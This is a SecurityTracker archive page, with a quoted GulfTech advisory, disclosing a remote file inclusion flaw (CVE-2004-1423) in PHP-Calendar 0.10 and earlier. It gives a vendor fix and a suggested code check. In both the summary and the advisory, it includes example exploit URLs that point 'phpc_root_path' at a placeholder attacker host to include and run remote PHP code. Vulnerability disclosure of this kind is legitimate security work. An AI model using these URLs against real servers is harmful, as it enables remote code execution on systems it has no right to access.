SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   PHP-Calendar Vendors:   php-calendar.sourceforge.net
PHP-Calendar Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012713
SecurityTracker URL:  http://securitytracker.com/id/1012713
CVE Reference:   CVE-2004-1423   (Links to External Site)
Updated:  Oct 23 2006
Original Entry Date:  Dec 29 2004
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.10 and prior versions
Description:   A vulnerability was reported in PHP-Calendar. A remote user can execute arbitrary commands on the target system.

James Bercegay of the GulfTech Security Research Team reported that the software does not properly validate user-supplied input in the 'phpc_root_path' variable. If the php globals configuration is set, then a remote user can supply a specially crafted URL to cause arbitrary PHP code from a remote site to be included and executed by the target system. Some demonstration exploit URLs are provided:

http://[target]/path/includes/calendar.php?phpc_root_path=http://[attacker]/includes/html.php
http://[target]/path/includes/setup.php?phpc_root_path=http://[attacker]/includes/html.php

The original advisory is available at:

http://www.gulftech.org/?node=research&article_id=00060-12292004

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (0.10.1).
Vendor URL:  php-calendar.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  php-Calendar File Include Vulnerability [ Command Exec ]


##########################################################
# GulfTech Security Research	        December 28th, 2004
##########################################################
# Vendor  : Sean Proctor
# URL     : http://php-calendar.sourceforge.net/
# Version : All Versions
# Risk    : File Include Vulnerability
##########################################################



Description:
I was searching for a decent calendar which my group at school 
could use to keep track of events, etc. We were previously using 
localendar, which I didn't like and it had some problems. I found 
CST-Calendar which did most of what I wanted, but was rather ugly 
and missed some features others in the group wanted. So, I 
gradually re-wrote CST-Calendar since that project seems to have 
stopped work entirely. [ As quoted from their website ]



File Include Vulnerability:
There is a very dangerous file include vulnerability in 
php-calendar, and making the issue even more dangerous is that I 
found out about php-calendar from an individual who said that 
php-calendar is a great open source calendar to use in php projects, 
and is fairly popular amongst open source php developers. This may be 
true, but the vulnerabilities need to be fixed if the same conditions 
apply as found in the original code. Below are example attack url's

http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/ht
ml.php
http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.
php

If php globals are set to on then it is highly probable that an 
attacker will be able to include arbitrary php files and thus execute 
system commands with the rights of the web server. This can be very 
dangerous in some situations.


Solution:
php-calendar has a defined constant to help prevent against stuff 
like this. It can be seen in other php-calendar files such as db.php

if ( !defined('IN_PHPC') ) {
	die("Hacking attempt");
}

Adding the following to the top of the affected pages should suffice 
in preventing the kinds of attacks previously mentioned in this advisory.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00060-12292004



Credits:
James Bercegay of the GulfTech Security Research Team

-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.296 / Virus Database: 265.6.6 - Release Date: 12/28/2004
 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC